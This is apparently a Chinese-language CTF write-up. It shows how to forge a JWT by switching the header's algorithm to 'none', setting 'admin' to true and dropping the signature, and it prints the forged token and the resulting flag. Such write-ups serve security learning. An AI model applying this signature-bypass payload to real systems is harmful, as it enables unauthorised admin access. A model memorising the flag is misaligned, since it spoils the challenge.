题目提示伪造 JWT 令牌,获取管理员权限
登录抓包
JWT令牌分为三段
1、eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9
2、eyJ1c2VyIjoic3NzIiwiYWRtaW4iOmZhbHNlfQ
3、m8V_HNSI65wv2XVsZlxjFapXhxILIgwSrqkMv4wdxBg
第一段解码后为{“alg”:”HS256”,”typ”:”JWT”},题目提示修改alg字段为none绕过签名验证
第二段解码后为{“user”:”sss”,”admin”:false},第三段解码后为乱码估计是验证部分,所以这里根据题目提示修改alg字段绕过验证,第三段因为绕过验证了所以不用加上
eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0=.eyJ1c2VyIjoic3NzIiwiYWRtaW4iOnRydWV9.
抓登录包修改token,这里登录包后面还有一个包也需要修改
修改完后得到flag
CTF{jwt_none_alg_bypass_success}